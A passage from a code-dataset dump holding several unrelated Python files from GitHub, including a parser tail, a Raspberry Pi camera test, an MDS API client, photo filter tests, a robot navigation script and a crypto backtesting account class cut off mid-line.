text[iter:])\n\t\t\t\texcept Exception as error:\n\t\t\t\t\tself._raise_exception(error, text, iter, end, builder)\n\n\tparse = __call__\n\n\tdef backup_parser_offset(self, i):\n\t\tself._backup_iter += i\n\n\t@staticmethod\n\tdef _raise_exception(error, text, start, end, builder, rule=None):\n\t\t# Add parser state, line count etc. to error, then re-raise\n\t\t# rule=None means error while processing unmatched text\n\t\tif isinstance(error, AssertionError):\n\t\t\terror = ParserError(str(error))\n\t\t\t# Assume any assertion is a parser check\n\n\t\tif hasattr(error, 'parser_offset'):\n\t\t\toffset = start + error.parser_offset\n\t\telse:\n\t\t\toffset = start\n\t\t\terror.parser_text = text[start:end]\n\t\t\terror.parser_builder = builder\n\t\t\terror.parser_rule = rule\n\n\t\terror.parser_offset = offset\n\t\terror.parser_line_offset = get_line_count(text, offset)\n\n\t\tif isinstance(error, ParserError):\n\t\t\traise error\n\t\telse:\n\t\t\traise # original error, do not change stack trace\n\n\ndef get_line_count(text, offset):\n\t'''Helper function used to report line numbers for exceptions\n\tthat happen during parsing.\n\t@param text: the text being parsed\n\t@param offset: character offset in this text\n\t@returns: a 2-tuple of the line and column that corresponds to this\n\toffset\n\t'''\n\t# line numbers start counting at 1, columns at 0\n\tif offset == 0:\n\t\treturn 1, 0\n\tslice = text[:offset]\n\tlines = slice.splitlines(1)\n\tif lines[-1].endswith('\\n'):\n\t\treturn len(lines) + 1, 0\n\telse:\n\t\treturn len(lines), len(lines[-1])\n","repo_name":"zim-desktop-wiki/zim-desktop-wiki","sub_path":"zim/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":13062,"program_lang":"python","lang":"en","doc_type":"code","stars":1788,"dataset":"github-code","pt":"68"} +{"seq_id":"29125527480","text":"import os\nfrom zipfile import ZipFile\n\n\nimport bs4\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n\ndef load_from_link(\n url: str,\n file_name: str,\n unzip_func,\n unzip_args: dict,\n extension: str = \"xml\",\n) -> str:\n \"\"\"\n download xml or zip file and extract it if the file value for extension is zip\n\n :parameter\n ----------\n\n :param url: Url of the file.\n :param file_name: Name you want to save the file with\n :param unzip_func: function to unzip the file downloaded\n :param unzip_args: arguments to pass in the unzip function\n :param extension: extension of file it will get from the url\n :return: file_name\n \"\"\"\n response = requests.get(url)\n with open(f\"{file_name}.{extension}\", \"wb\") as file:\n file.write(response.content)\n\n if extension == \"zip\":\n unzipped_file_path = unzip_func(**unzip_args)\n return unzipped_file_path\n return file_name\n\n\nclass Utility:\n \"\"\"\n All the utility function for the completion of the question.\n \"\"\"\n\n def __init__(self, filepath: str):\n self.filepath = filepath\n self.unzipped_file_path = None\n\n @classmethod\n def init_load(\n cls,\n file_link,\n extension: str,\n ):\n file_path = load_from_link(\n url=file_link,\n file_name=\"interview\",\n extension=extension,\n unzip_func=cls.unzip_file,\n unzip_args={\"filename\": \"interview\", \"extension\": extension}\n\n )\n return cls(filepath=file_path)\n\n @staticmethod\n def unzip_file(\n filename: str,\n key: str,\n root: str = \"../\",\n ):\n \"\"\"\n Takes in filename and unzips it, if the file name is not a zipfile it will raise BadzipFile error.\n\n :param filename:\n :param key: str to search in the file name\n :param root: path where to search the file.\n :return: str or None\n \"\"\"\n with ZipFile(filename, \"r\") as zipped_file:\n zipped_file.extractall()\n for dir_path, dir_names, file_names in os.walk(root):\n for file in file_names:\n if key in file.lower():\n return f\"{dir_path}/{file}\"\n return None\n\n\n\n def find_in_xml_file(\n self,\n attrs: dict,\n ) -> list[bs4.PageElement]:\n \"\"\"\n Finds the first element with the attribute as :attrs\n\n :param attrs: attributes associated with element you want to find.\n :param file_path: file path you want find the element in.\n :return: treasure: first link from the xml file with attrs\n \"\"\"\n with open(f\"{self.filepath}.xml\", \"r\") as xml_file:\n soup = BeautifulSoup(xml_file, features=\"xml\")\n treasure = soup.find(attrs=attrs)\n return treasure.contents\n\n def convert_to_csv(\n self,\n data: dict[str, list],\n filename: str = \"result\",\n ):\n \"\"\"\n Takes in a dictionary where key(str) is treated as column name and value is treated as rows(should be list) and\n converts it to csv file.\n\n :parameter\n ----------\n\n :param data: Dict in form of {\"column_name\": [row_value_1, row_value_2], ..., }\n :param filename: Name of the file will be saved with.\n :return: None\n \"\"\"\n data = pd.DataFrame(data=data)\n data.to_csv(filename)\n\n\nLINK = \"https://registers.esma.europa.eu/solr/esma_registers_firds_files/select?q=*&fq=publication_date:%5B2021-01-17T00:00:00Z+TO+2021-01-19T23:59:59Z%5D&wt=xml&indent=true&start=0&rows=100\"","repo_name":"surajsarkar/assignment","sub_path":"utils/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11163251542","text":"import sys\nfrom modim_interaction import *\nfrom pddl2txt import *\nfrom scripts_ import *\n\n\ndestinations = {\"banca\": \"pos7_12\",\"fisiologia umana\" :\"pos12_7\",\"fisiologia generale\" :\"pos12_11\",\"botanica\":\"pos9_18\",\"genetica\":\"pos10_19\",\"medicina legale\":\"pos5_22\",\"obitorio\":\"pos5_22\",\"scienze statistiche\":\"pos13_5\",\"scienze solitiche\":\"pos15_9\",\"ciao\":\"pos13_15\",\"lettere e filosofia\":\"pos16_20\",\"scienze umanistiche\":\"pos16_20\",\"laboratori chimica\":\"pos13_24\",\"fisica\":\"pos23_14\",\n \"chimica\":\"pos23_16\",\"chimica farmaceutica\":\"pos21_22\",\"geologia\":\"pos18_10\",\"giurisprudenza\":\"pos17_12\",\n \"matematica\":\"pos19_22\",\"igiene\":\"pos27_14\",\"zoologia\":\"pos21_6\",\"neurologia\":\"pos24_6\",\"scienze dello spettacolo\":\"pos27_8\",\"ortopedia\":\"pos27_15\"}\n\nvocab = ['banca', 'fisiologia', 'botanica', 'genetica', 'medicina', 'obitorio', 'scienze statistiche', 'scienze politiche', 'ciao',\n 'lettere e filosofia', 'scienze umanistiche', 'laboratori chimica', 'fisica', 'chimica', 'chimica farmaceutica', 'geologia',\n 'giurisprudenza', 'matematica', 'igiene', 'zoologia', 'neurologia', 'scienze dello spettacolo', 'ortopedia']\n\nspeech = Speech()\ngesture = Gestures()\ndef main_run():\n \n interaction = start_interaction(speech)\n \n if (interaction):\n speech.say(\"Do you need indications or do you want to play?\")\n rightanswer=False\n while(not rightanswer):\n answer = speech.listen()\n \n if answer == \"Indications\":\n rightanswer = True\n \n speech.say(\"Perfect! Where do you have to go?\")\n goal = speech.listen(vocabulary=vocab)\n \n if (goal not in vocab):\n find = False\n \n while(not find):\n speech.say(\"Sorry I didn't understand, can you repeat please?\")\n goal = speech.listen(vocabulary=vocab)\n \n if (str(goal) in vocab):\n find=True\n\n speech.say(\"Ok, now using the tablet press on the cells in which are obstacles, if None press the Ok button\")\n \n #take the cell position\n \n for pos in destinations:\n if (pos == goal):\n goal = destinations[pos]\n \n #modify the javascript of the grid\n with open(\"../grid.js\",\"r\") as f:\n js_file = f.readlines()\n f.close()\n gg = goal.strip(\"pos\\n\").split(\"_\")\n \n js_file[0] = \"var goalx = \"+gg[0]+\";\\n\"\n js_file[1] = \"var goaly = \"+gg[1]+\";\\n\"\n with open(\"../grid.js\",\"w\") as f:\n for js_line in js_file:\n f.write(js_line)\n f.close()\n \n #APRI INTERAZIONE CON MAPPA SUL TABLET\n TabletInteraction(\"i1\")\n \n speech.say(\"please wait, i'm computing the best path for you\")\n \n with open(\"../utils/obs.out\",\"r\") as f:\n obs = f.readline()\n f.close()\n obs = obs.strip(\"\\n\")\n\n img_p = create_problem(obs,goal)\n \n with open(\"../actions/quit\",\"r\") as f:\n lines = f.readlines()\n f.close()\n lines[1] = \"<*,*,*,*>: img/\"+img_p+\"\\n\"\n \n with open(\"../actions/quit\",\"w\") as f:\n for line in lines:\n f.write(line)\n f.close()\n \n speech.say(\"I'm ready! Look at my tablet to see your path\")\n \n TabletInteraction(\"i3\")\n \n speech.say(\"I hope it helped, see you next time bye!\")\n gesture.sayhi()\n \n elif answer==\"Play\":\n rightanswer = True\n speech.say(\"Perfect! Let's play a memory game on the tablet\")\n #APRI INTERAZIONE CON GIOCO SU TABLET\n \n TabletInteraction(\"i2\")\n \n speech.say(\"I hope you had fun, see you next time bye!\")\n gesture.sayhi()\n else:\n speech.say(\"Sorry, I didn't understand\")\n return\n \nif __name__ == \"__main__\":\n\n while True:\n try:\n sonar = Sonar()\n check = sonar.listen(detected=False)\n if check == 'front':\n main_run()\n except KeyboardInterrupt:\n print(\"Interrupted\")\n Reset()\n sys.exit(0)\n","repo_name":"onaidra/EAI2","sub_path":"EAI2Project/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31008027115","text":"#!/usr/bin/env python3\n\nimport time # For time keeping\nimport picamera # For interfacting with the PiCamera\nimport RPi.GPIO as gpio # For\n\n\nSEL_1 = 22\nSEL_2 = 23\nLED_GREEN = 24\nLED_BTM = 26\nLED_AMBER = 27\n\n# Initialize GPIO pins\ngpio.setmode(gpio.BCM)\ngpio.setup(SEL_1, gpio.OUT) # select 1\ngpio.setup(SEL_2, gpio.OUT) # select 2\ngpio.setup(LED_GREEN, gpio.OUT) # status led1\ngpio.setup(LED_AMBER, gpio.OUT) # status led2\ngpio.setup(LED_BTM, gpio.OUT) # status led3\n\n# Turn off LEDs\ngpio.output(LED_GREEN, True)\ntime.sleep(0.1)\ngpio.output(LED_AMBER, True)\ntime.sleep(0.1)\ngpio.output(LED_BTM, False)\n\nRESOLUTION = (1280, 720)\n\ndef blink(pin, repeat, interval):\n on = False\n off = True\n if pin == LED_BTM:\n on = True\n off = False\n for i in range(repeat):\n gpio.output(pin, on)\n time.sleep(interval)\n gpio.output(pin, off)\n time.sleep(interval)\n\n# For Selecting Cam and taking + saving a picture\ndef camcapture(_cam, _camno):\n print('selectcam( ', _camno, ' )')\n if _camno < 1 or _camno > 3:\n print('[selectcam] invalid cam number!')\n else:\n if _camno == 1:\n print(\"select cam 1\")\n gpio.output(SEL_1, False)\n gpio.output(SEL_2, False)\n if _camno == 2:\n print(\"select cam 2\")\n gpio.output(SEL_1, True)\n gpio.output(SEL_2, False)\n if _camno == 3:\n print(\"select cam 3\")\n gpio.output(SEL_1, True)\n gpio.output(SEL_2, True)\n time.sleep(0.2)\n dir = '/home/pi/Desktop/cam-tests/'\n photoname = dir + 'cam' + str(_camno) + '.jpg'\n print(photoname)\n _cam.capture(photoname)\n print('cam', str(_camno), '- picture taken!')\n\ndef main():\n # Hello blinks\n blink(LED_GREEN, 2, 0.1)\n blink(LED_AMBER, 2, 0.1)\n blink(LED_BTM, 2, 0.1)\n\n # Initialize camera object\n print('initializing camera')\n gpio.output(SEL_1, False)\n gpio.output(SEL_2, False)\n time.sleep(0.1)\n cam = picamera.PiCamera()\n cam.resolution = RESOLUTION\n\n # take three pictures\n camcapture(cam, 1)\n camcapture(cam, 2)\n camcapture(cam, 3)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mbaytas/capra","sub_path":"tests/cam-test.py","file_name":"cam-test.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"41077100538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nget future info from file or database\n\"\"\"\nimport os\nimport pandas as pd\n\nfrom Quant.instrument import Instrument\nfrom utils import LogHandler\n\nlog = LogHandler('future')\n\n\nclass Future(Instrument):\n future_dir = os.path.join(Instrument.base_dir, 'future')\n if not os.path.exists(future_dir):\n os.makedirs(future_dir)\n\n def __init__(self, market='dce', period='day'):\n super(Future, self).__init__(market, period)\n self.db = self.mongo['futures']\n\n def variety(self, market='', varietyid=''):\n filter_dict = {}\n if market:\n filter_dict['market'] = market\n\n if varietyid:\n filter_dict['varietyid'] = varietyid.upper()\n\n return self.find(self.db['variety'], filter_dict)\n\n def contract(self, market='', varietyid='', contractid='', update=''):\n filter_dict = {}\n\n if market:\n filter_dict['market'] = market\n if contractid:\n filter_dict = {'contractid': contractid.lower()}\n if varietyid:\n filter_dict['varietyid'] = varietyid.upper()\n if update:\n update = int(update.strftime('%Y%m%d'))\n filter_dict['end'] = {'$gt': update}\n\n return self.find(self.db['contract'], filter_dict)\n\n def option(self, market='', varietyid='', contractid='', update=''):\n filter_dict = {}\n\n if market:\n filter_dict['market'] = market\n if contractid:\n filter_dict = {'contractid': contractid.lower()}\n if varietyid:\n filter_dict['varietyid'] = varietyid.upper()\n if update:\n update = int(update.strftime('%Y%m%d'))\n filter_dict['end'] = {'$gt': update}\n\n return self.find(self.db['option'], filter_dict)\n\n\nif __name__ == '__main__':\n future = Future()\n print(future.contract().tail())\n print('====================================================')\n print(future.contract(contractid='i1801').tail())\n print('====================================================')\n print(future.contract(varietyid='i').tail())\n print('====================================================')\n print(future.contract(varietyid='ii'))\n print('====================================================')\n import datetime as dt\n\n print('====================================================')\n print(future.contract(varietyid='i', update=dt.datetime.now()).tail())\n print('====================================================')\n print(future.contract(update=dt.datetime.now()).tail())\n print(future.contract(market='DCE', update=dt.datetime.now()).tail())\n print('====================================================')\n # print(future.variety())\n # print(future.variety(market='大连交易所'))\n # print('====================================================')\n # print(future.variety(market='大连商品交易所'))\n # print('====================================================')\n # print(future.variety(market='大连商品交易所', varietyid='i'))\n # print(future.variety(varietyid='i'))\n # print(future.variety(varietyid='ii'))\n","repo_name":"newlyedward/Crawler","sub_path":"Quant/future.py","file_name":"future.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38626833408","text":"\"\"\"\nClass: MDSClient\n\nAuthor: Austin Transportation Department, Data and Technology Services\n\nDescription: The purpose of this class is to provide an extensible architecture that\nallows different MDS client versions, it basically acts as an abstraction layer\nand the actual implementation is unique per MDS client class.\n\nThe application requires the requests library:\n https://pypi.org/project/requests/\n\"\"\"\nfrom .clients import *\nfrom .MDSAuth import MDSAuth\n\n# Debug & Logging\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\nclass MDSClient:\n __slots__ = (\n \"config\",\n \"authenticated\",\n \"mds_headers\",\n \"auth_headers\",\n \"version\",\n \"provider\",\n \"custom_client\",\n \"auth_client\",\n \"mds_client\",\n \"custom_authentication\",\n )\n\n def __init__(self, config={}, custom_authentication=None, **kwargs):\n \"\"\"\n Constructor for this class\n :param dict config: A dictionary of properties.\n :param function custom_authentication: A python function to use for authentication\n :param dic kwargs: Any additional parameters passed to subclasses\n\n Parameters:\n :param str version: The version of the mds library to be loaded.\n :param dict config: The configuration to be passed to the\n :param str provider: The provider name or UUID\n \"\"\"\n # Merge config and kwargs into a single dictionary\n self.config = {**config, **kwargs}\n\n # Try to find in the config the MDS version we are working with\n self.provider = self.config.get(\"provider\", None)\n # Tries to find version in the config, or assumes 0.2.0\n self.version = self.config.get(\"version\", \"0.2.0\")\n # Try to find the default_class (an MDS class override) or assume None\n self.custom_client = self.config.get(\"custom_client\", None)\n # Assume the headers to be empty\n self.mds_headers = None\n self.auth_headers = None\n # Assume authenticated is False\n self.authenticated = False\n\n # Try to find a custom authentication function, assume None\n self.custom_authentication = custom_authentication\n\n # Initialize authentication client\n self.auth_client = MDSAuth(\n config=self.config, custom_function=self.custom_authentication\n )\n\n # Initialize MDS Client\n self.mds_client = self.load_mds_client(\n version=self.version, custom=self.custom_client,\n )(config=self.config)\n\n self._load_custom_headers()\n self._authenticate()\n\n @staticmethod\n def load_mds_client(version, custom=None):\n \"\"\"\n Returns the class reference to be initialized later.\n :param str version: The version of MDS to initialize\n :param object custom: MDS Class override option\n :return object: The MDS class to be used\n \"\"\"\n # Check for class override\n if custom is not None:\n return custom\n # Proceed with normal version check & load class\n else:\n return {\n \"0.2.0\": MDSClient020,\n \"0.3.0\": MDSClient030,\n \"0.4.0\": MDSClient040,\n }.get(version, custom)\n\n def _load_custom_headers(self):\n logging.debug(f\"MDSClient::get_trips() Loading custom headers...\")\n custom_headers = self.config.get(\"headers\", {})\n for key, value in custom_headers.items():\n self.mds_client.set_header(key=key, value=value)\n\n def get_trips(self, start_time, end_time):\n \"\"\"\n Returns the trips for the current client\n :param start_time:\n :param end_time:\n :return:\n \"\"\"\n logging.debug(f\"MDSClient::get_trips() Getting trips for start_time: {start_time}, end_time: {end_time} \")\n return self.mds_client.get_trips(\n start_time=start_time, end_time=end_time\n )\n\n def show_config(self):\n \"\"\"\n logging.debugs the current version & configuration of the client\n :return:\n \"\"\"\n logging.debug(f\"MDSClient::show_config() Current MDS version loaded: {self.mds_client.version}\")\n logging.debug(self.mds_client.config)\n\n def _authenticate(self):\n \"\"\"\n It authenticates the client using the provided configuration\n :return:\n \"\"\"\n logging.debug(\"MDSClient::authenticate() Generating headers...\")\n self.auth_headers = self.auth_client.authenticate()\n logging.debug(\"MDSClient::authenticate() Checking headers...\")\n if self.auth_headers:\n logging.debug(\"MDSClient::authenticate() Authentication succeeded...\")\n self.authenticated = True\n\n self.mds_client.set_header(\n \"Accept\", f\"application/vnd.mds.provider+json;version={self.version[:3]}\"\n )\n self.mds_client.render_settings(headers=self.auth_headers)\n\n logging.debug(\"MDSClient::authenticate() Final headers: \")\n logging.debug(self.mds_client.get_headers())\n\n else:\n logging.debug(\"MDSClient::authenticate() Authentication failed\")\n","repo_name":"cityofaustin/atd-mds-client","sub_path":"mds/MDSClient.py","file_name":"MDSClient.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"29741747271","text":"print('hej, tu nowe repo')\n\n\ndef merged(list1, list2):\n list1.extend(list2)\n for element in list1[:]:\n if list1.count(element) >= 2:\n list1.remove(element)\n return list1\n\nlist1 = [1, 2, 3, 4, 5, 6]\nlist2 = [4, 5, 6, 7, 8, 9]\n\nprint(merged(list1, list2))\n\n\nprint('a to zmiana dla nowej gałęzi')\nprint('hej kocham cię')\n","repo_name":"borowkatraktor/probne_repo","sub_path":"pierwszy.py","file_name":"pierwszy.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36218062082","text":"from cachetools import TTLCache\n\nfrom data import Table, RowTable\n\n\nprofile_tags = Table('member_profile_tags', attach_as='profile_tags')\n\n\n@profile_tags.save_query\ndef get_tags_for(guildid, userid):\n rows = profile_tags.select_where(\n guildid=guildid, userid=userid,\n _extra=\"ORDER BY tagid ASC\"\n )\n return [row['tag'] for row in rows]\n\n\nweekly_goals = RowTable(\n 'member_weekly_goals',\n ('guildid', 'userid', 'weekid', 'study_goal', 'task_goal'),\n ('guildid', 'userid', 'weekid'),\n cache=TTLCache(5000, 60 * 60 * 24),\n attach_as='weekly_goals'\n)\n\n\n# NOTE: Not using a RowTable here since these will almost always be mass-selected\nweekly_tasks = Table('member_weekly_goal_tasks')\n\n\nmonthly_goals = RowTable(\n 'member_monthly_goals',\n ('guildid', 'userid', 'monthid', 'study_goal', 'task_goal'),\n ('guildid', 'userid', 'monthid'),\n cache=TTLCache(5000, 60 * 60 * 24),\n attach_as='monthly_goals'\n)\n\nmonthly_tasks = Table('member_monthly_goal_tasks')\n","repo_name":"justw0rk/StudyLion","sub_path":"bot/modules/stats/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"34376439730","text":"from hypothesis import given\n\nfrom tumpara.api.filtering import NumericFilter\nfrom tumpara.content.gallery.api.filtersets import PhotoFilterSet\nfrom tumpara.content.gallery.models import Photo\nfrom tumpara.storage.models import Library\nfrom tumpara.testing import strategies as st\n\nfrom ..test_timeline.test_entry_filtersets import check_results\n\n\n@st.composite\ndef datasets(draw: st.DataObject.draw) -> st.SearchStrategy[set[Photo]]:\n library = Library.objects.create(source=\"file://\", context=\"testing\")\n return draw(\n st.sets(\n st.from_model(Photo, library=st.just(library), archived=st.just(False)),\n min_size=2,\n )\n )\n\n\n@given(datasets())\ndef test_width_filtering(django_executor, photos: set[Photo]):\n \"\"\"The width filter gets passed along correctly.\"\"\"\n # Using the median value as the limiting value here makes sure that at least one\n # photo is filtered out and at least one stays in.\n median_value = sorted(photos, key=lambda photo: photo.width)[\n int(len(photos) / 2)\n ].width\n check_results(\n {photo for photo in photos if photo.width >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n width=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_height_filtering(django_executor, photos: set[Photo]):\n \"\"\"The height filter gets passed along correctly.\"\"\"\n median_value = sorted(photos, key=lambda photo: photo.height)[\n int(len(photos) / 2)\n ].height\n check_results(\n {photo for photo in photos if photo.height >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n height=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_smaller_axis_filtering(django_executor, photos: set[Photo]):\n \"\"\"The filter for the smaller axis gets passed along correctly.\"\"\"\n median_photo = sorted(photos, key=lambda photo: min(photo.width, photo.height))[\n int(len(photos) / 2)\n ]\n median_value = min(median_photo.width, median_photo.height)\n check_results(\n {photo for photo in photos if min(photo.width, photo.height) >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n smaller_axis=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_larger_axis_filtering(django_executor, photos: set[Photo]):\n \"\"\"The filter for the larger axis gets passed along correctly.\"\"\"\n median_photo = sorted(photos, key=lambda photo: max(photo.width, photo.height))[\n int(len(photos) / 2)\n ]\n median_value = max(median_photo.width, median_photo.height)\n check_results(\n {photo for photo in photos if max(photo.width, photo.height) >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n larger_axis=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_megapixel_filtering(django_executor, photos: set[Photo]):\n \"\"\"The megapixel count filter gets passed along correctly.\"\"\"\n median_value = sorted(photos, key=lambda photo: photo.megapixels)[\n int(len(photos) / 2)\n ].megapixels\n check_results(\n {photo for photo in photos if photo.megapixels >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n megapixels=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n","repo_name":"tumpara/server","sub_path":"tests/test_gallery/test_filtersets.py","file_name":"test_filtersets.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"26542393149","text":"class UF:\n def __init__(self):\n self.root = {}\n \n def insert(self, a: int) -> None:\n if a not in self.root:\n self.root[a] = a\n \n def find(self, a: int) -> int:\n self.insert(a)\n if self.root[a] != a:\n self.root[a] = self.find(self.root[a])\n return self.root[a]\n \n def union(self, a: int, b: int) -> None:\n a, b = self.find(a), self.find(b)\n if a != b:\n self.root[b] = a\n\nclass Solution:\n def minScore(self, n: int, roads: List[List[int]]) -> int:\n uf = UF()\n for u, v, _ in roads:\n uf.union(u, v)\n res = float(\"inf\")\n root = uf.find(1)\n for u, v, d in roads:\n u, v = uf.find(u), uf.find(v)\n if u == root or v == root:\n res = min(res, d)\n return res\n \n graph = {}\n for u, v, d in roads:\n if u not in graph:\n graph[u] = []\n if v not in graph:\n graph[v] = []\n graph[u].append([v, d])\n graph[v].append([u, d])\n \n def dfs(n: int, seen: set) -> int:\n nonlocal graph\n seen.add(n)\n res = float(\"inf\")\n for next, d in graph[n]:\n res = min(res, d)\n if next not in seen:\n res = min(res, dfs(next, seen))\n return res\n \n return dfs(1, set())","repo_name":"cli3338198/leetcode","sub_path":"2492-minimum-score-of-a-path-between-two-cities/2492-minimum-score-of-a-path-between-two-cities.py","file_name":"2492-minimum-score-of-a-path-between-two-cities.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4661898180","text":"# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n__author__ = 'xin'\n\n\"\"\"\n此文件是创建虚拟账户 \n\"\"\"\n# from Data.dataMain import HistoryData\nfrom pprint import pprint\nimport talib\nimport numpy as np\nfrom collections import OrderedDict\nimport datetime\nfrom Strategy.strategySpotMain import Strategy\nimport copy\n\n\nclass Order(object):\n def __init__(self, symbol, amount, time=None, type='market', price=0.):\n self.order_time = '' # 指令下达时间 datetime\n self.symbol = symbol # 交易标的\n self.type = type # 下单类型\n self.price = price # 价格\n self.amount = amount # 指令交易数量\n\n pass\n\n\nclass Account(object):\n # 初始化设置\n def __init__(self, init_dict, strategy_arg):\n self.strategy_arg = strategy_arg\n\n # TODO 多币种的时候 需要更改 目前已BTC作为结算\n self.symbol_list = init_dict['symbol_list'] # symbol list\n self.cash = copy.deepcopy(init_dict['cash']) # 初始金额\n self.balance_dict = copy.deepcopy(init_dict['cash']) # 账户余额\n self.btc_balance = [] # 记录btc变化余额\n self.free_cash = copy.deepcopy(init_dict['cash']['BTC']) # 可使用资金\n self.today_symbol_price = {} # 记录当天价格\n self.firstday_symbol_price = {} # 记录第一天的价格\n self.end_balance = 0\n\n self.para_allowCash = 0 # 在最后一天计算 策略 允许的最小容量\n self.allow_min_coin_dict = {} # 各个币种最近容量\n\n for symbol in init_dict['symbol_list']:\n self.today_symbol_price[symbol] = np.nan\n self.firstday_symbol_price[symbol] = np.nan\n\n self.historyOrder_list = [] # 历史订单\n self.historyLimitOrder_list = []\n\n self.buy_fee = init_dict['fee']['buy_fee'] # 开仓手续费\n self.sell_fee = init_dict['fee']['sell_fee'] # 平仓手续费\n\n self.buy_openPrice_dict = {}\n self.sell_openPrice_dict = {}\n\n self.csv_time_list = []\n self.csv_signal_dict = {}\n self.csv_amount_dict = {}\n self.csv_balance_dict = {}\n self.csv_dataPrice_list = []\n\n for symbol in init_dict['cash']:\n self.csv_balance_dict[symbol] = []\n\n # 获取历史订单\n def get_user_history_orders(self):\n # print('获取历史订单', self.historyOrder_list)\n return self.historyOrder_list\n\n # 获取持仓单\n def get_user_orders(self):\n # TODO 返回历史订单\n return self\n\n def get_history(self, symbol, start, end, freq):\n \"\"\"\n 获取历史数据\n :param symbol: 交易标的\n :param start: 起始时间\n :param end: 结束时间\n :param freq: 时间周期\n :return: { symbol : {closePrice:[ , , ,],\n openPrice:[ , , ,],\n highPrice:[ , , ,],\n }\n \"\"\"\n return HistoryData().get_history_data()\n\n # 获取前一日的价格数据\n def get_before_data(self, data, i):\n try:\n before_data = data.ix[:i+1, :]\n except:\n before_data = None\n # print('before_data',before_data)\n return before_data\n\n # 获取信号\n def handle_signal(self, info, data, i):\n today = data.index[i]\n # today_str = datetime.datetime.strftime(today, \"%Y-%m-%d %H:%M:%S\")\n price = data[data.columns[0]][i]\n try:\n today_next = data.index[i + 1]\n except:\n today_next = np.nan\n\n try:\n price_next = data[data.columns[0]][i + 1]\n except:\n price_next = np.nan\n\n self.csv_signal_dict[today] = ''\n self.csv_amount_dict[today] = np.nan\n self.buy_openPrice_dict[today] = np.nan\n self.sell_openPrice_dict[today] = np.nan\n\n if info:\n if info['type'] == 'limit':\n order_info = {}\n order_info['id'] = info['id']\n order_info['price'] = info['price']\n order_info['symbol'] = info['symbol']\n order_info['date_time'] = today_next\n order_info['side'] = info['side']\n order_info['amount'] = info['amount']\n order_info['type'] = info['type']\n\n self.historyLimitOrder_list.append(order_info)\n\n else:\n print('出现信号')\n # print('下一时刻{}-价格{}'.format(today_next, price_next))\n order_info = {}\n order_info['id'] = info['id']\n order_info['price'] = price_next\n order_info['date_time'] = today_next\n order_info['symbol'] = info['symbol']\n order_info['side'] = info['side']\n order_info['amount'] = info['amount']\n order_info['type'] = info['type']\n\n self.add_info(order_info)\n\n else:\n print('没有出现信号')\n return {}\n\n # 添加订单信息\n def add_info(self, order_dict):\n self.historyOrder_list.append(order_dict)\n\n def handle_balance(self, info_dict):\n first_coin = info_dict['symbol'][0:3]\n end_coin = info_dict['symbol'][-3:]\n symbol_coin = first_coin + end_coin\n # print(first_coin, end_coin)\n if info_dict['side'] == 'buy':\n # self.balance_dict['BTC'] += float(info_dict['amount'])\n self.balance_dict[first_coin] += float(info_dict['amount']) * float(1 - self.buy_fee)\n self.balance_dict[end_coin] -= float(info_dict['amount']) * float(info_dict['price'])\n\n self.csv_signal_dict[info_dict['date_time']] = 'buy'\n self.csv_amount_dict[info_dict['date_time']] = float(info_dict['amount'])\n\n self.buy_openPrice_dict[info_dict['date_time']] = info_dict['price']\n\n else:\n self.balance_dict[end_coin] += float(info_dict['amount']) * float(info_dict['price'])\n self.balance_dict[first_coin] -= float(info_dict['amount']) * float(1 - self.sell_fee)\n # self.balance_dict['BTC'] -= float(info_dict['amount'])\n self.csv_signal_dict[info_dict['date_time']] = 'sell'\n self.csv_amount_dict[info_dict['date_time']] = float(info_dict['amount'])\n self.sell_openPrice_dict[info_dict['date_time']] = info_dict['price']\n\n pprint(self.balance_dict)\n\n # 全部则换成end_coin 值\n info = {} # 保存现在 和 初始的差值信息\n for sym, val in self.cash.items():\n for new_sym, new_val in self.balance_dict.items():\n # print('cash', self.cash)\n # print('balance', self.balance_dict)\n if sym == new_sym:\n info[sym] = float(new_val) - float(val)\n print('差值', info)\n\n self.end_balance = 0\n for _key, _val in info.items():\n if _key == first_coin:\n self.end_balance += float(self.today_symbol_price[symbol_coin]) * 